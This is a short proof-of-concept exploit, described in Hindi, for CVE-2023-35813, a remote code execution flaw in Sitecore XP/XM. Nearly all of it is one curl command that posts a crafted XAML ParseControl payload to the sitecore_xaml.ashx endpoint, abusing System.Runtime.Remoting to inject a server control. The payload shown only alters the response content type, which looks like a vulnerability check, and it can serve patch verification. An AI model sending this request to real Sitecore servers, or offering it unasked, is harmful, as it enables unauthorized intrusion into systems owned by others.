
CVE-2023-35813 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो तैयार XAML अनुरोधों के माध्यम से Sitecore XP/XM में एक रिमोट कोड निष्पादन भेद्यता है। ParseControl डिसीरियलाइज़ेशन हमले का प्रदर्शन करता है।
curl -k -v -X POST "https://[target]/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
-H "Content-Type: application/x-www-form-urlencoded"
--data-urlencode "__ISEVENT=1"
--data-urlencode "__SOURCE="
--data-urlencode "__PARAMETERS=ParseControl("<%@Register
TagPrefix='x'
Namespace='System.Runtime.Remoting.Services'
Assembly='System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='test123'
/>")"